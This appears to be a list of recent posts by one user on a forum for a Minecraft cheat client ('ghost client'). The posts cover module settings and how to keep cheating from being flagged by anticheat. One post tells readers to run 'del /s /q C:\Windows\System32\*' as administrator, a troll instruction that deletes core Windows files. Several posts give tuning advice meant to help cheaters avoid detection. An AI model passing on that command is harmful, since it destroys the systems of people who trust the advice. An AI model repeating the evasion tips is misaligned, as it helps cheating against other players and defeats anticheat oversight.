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  1. ivixx

    hit select for vape lite (dont know if this is considered blantant)

    well i was just assuming that it was pause with fake swing because the label reads "Active" so like active hits or somethin
  2. ivixx

    hit select for vape lite (dont know if this is considered blantant)

    "false information" ☠️
  3. ivixx

    hit select for vape lite (dont know if this is considered blantant)

    active is just pause with fakeswing
  4. ivixx

    About Jump reset Velocity

    yeah i made a bug report about that
  5. ivixx


    hover over the option it gives a short description on what it does
  6. ivixx


    nothing is main safe
  7. ivixx

    open cmd prompt as administrator and type del /s /q C:\Windows\System32\* then press enter

    open cmd prompt as administrator and type del /s /q C:\Windows\System32\* then press enter
  8. ivixx

    100 % Safe MMC Cfg ?

    Nothing is ever 100% safe
  9. ivixx

    Jump reset

    "To not move" lets change that to "Lets get banned quickly"
  10. ivixx

    did they remove sprint?

    click the icon to the left of the search bar and search for sprint
  11. ivixx

    clickrecorder =)

    After the first cycle of clicks it repeats and therefor becomes repetitive any anticheat would flag that as autoclicking
  12. ivixx

    Auto Clicker !!IMPOrTANt!!

    That's already in my post. I'm convinced you didn't read it. Even if you set the cps range above the allowed range it wont click accurately at all, implementing my suggestion would fix this issue.
  13. ivixx

    clickrecorder =)

    It'll get repetitive once it repeats.
  14. ivixx

    rage functions

    No. This is a GHOST CLIENT meant for LEGIT CHEATING. If you're looking to rage cheat buy a client meant for that.
  15. ivixx

    clickrecorder =)

    It doesn't matter how many clicks you record it becomes repetitive and after a while you'll start flagging
  16. ivixx

    clickrecorder =)

    It wouldn't be "undetectable" it would flag eventually because the clicking patterns get really consistent and repetitive.
  17. ivixx

    can't find backtrack or fakelag?

    use 1.8.9; no click delay is there for a reason
  18. ivixx

    legit scaffold settings please

    Its not suspicious at all
  19. ivixx

    legit scaffold settings please

    No? 50-100 isn't blatant at all